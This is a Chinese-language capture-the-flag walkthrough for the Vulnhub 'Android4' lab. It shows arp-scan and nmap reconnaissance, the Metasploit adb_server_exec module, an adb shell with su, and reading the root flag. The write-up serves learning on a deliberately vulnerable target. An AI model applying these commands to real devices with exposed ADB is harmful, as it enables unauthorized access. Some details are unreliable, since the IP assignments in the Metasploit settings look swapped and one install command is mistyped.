記一次對`vulnhub`中`Android4`靶機滲透測試全過程
記一次對vulnhub
中Android4
靶機滲透測試全過程
Android4
靶機簡介
名稱:Android4
作業系統:Android v4.4
標誌:/data/root/
(在此目錄中)
等級:初學者。
搭建成功的Android
平臺
知識點
埠掃描和
IP
發現使用
adb_server_exec
攻擊埠8080代理使用
ADB
連線到裝置。使用
metasploit
。特權升級和找到答案
滲透過程
1:獲取IP地址
使用命令:arp-scan -l
由此我們可以看到靶機的IP
地址:192.168.232.146
2:掃描開放埠
在此掃描中,我們將使用最流行的工具nmap
進行全端激進掃描
使用命令:nmap -p- -A 192.168.232.146
由此我確定存在與埠8080
相關的某種網頁。
沒有任何延遲,我打開了網頁,但什麼也沒找到。
大多數人都會確定使用POST
方法涉及某種語言篡改。我也嘗試過,但沒有發現任何有用的東西。
在嘗試了一些其他方法(PHP CLI
和Dropbear RCE
)之後,我發現了一種比較好的方法
關於PHP CLI
的漏洞掃描:searchsploit -w php cli
(關於searchsploit
的使用方法:記一次在實戰靶機中使用SearchSploit
的總結)
我試過PHP CLI
和Dropbear RCE
之後發現Dropbear
的掃描會得到有用的資訊
Android Debug Bridge(adb)
是一個多功能的命令列工具,可讓您與裝置進行通訊(關於adb
的使用方法:adb使用-詳細教程(Awesome Adb))
adb
命令可以促進各種裝置操作,例如安裝和除錯應用程式,並且可以訪問可用於在裝置上執行各種命令的Unix shell
。
它是一個客戶端 - 伺服器程式,包括三個元件
1:傳送命令的客戶端。客戶端在您的開發計算機上執行。您可以通過發出adb命令從命令列終端呼叫客戶端。 2:一個守護程式(adbd),它在裝置上執行命令。守護程式在每個裝置上作為後臺程序執行。 3:伺服器,用於管理客戶端和守護程式之間的通訊。伺服器作為開發計算機上的後臺程序執行。
如果您沒有安裝adb
,可以通過sudo apt-get install adb
安裝它
sudo apt-get install abd
要啟動ADB伺服器,我們使用了metasploit
:
首先:啟動metasploit
msfconsole
本地埠很可能不接受連線。在這種情況下,我們將預設埠從4444
更改為3333
use exploit/android/adb/adb_server_exec
set RHOST 192.168.232.145
set LHOST 192.168.232.146
set LPORT 3333
exploit
接下來就是需要使用adb
只要上面狀態顯示“正在連線到裝置”,在新的終端視窗上鍵入命令:
adb connect 192.168.232.146:5555
adb shell
我們檢視一下密碼:
並沒有發現什麼有用的內容
去defaullt
目錄:
su
id
ls
在/data
目錄中,我們找到了一個名為“root
”的資料夾
cd /data
ls
最後一步是成功得到答案:
cd /root
ls
cat flag.txt
參考資料: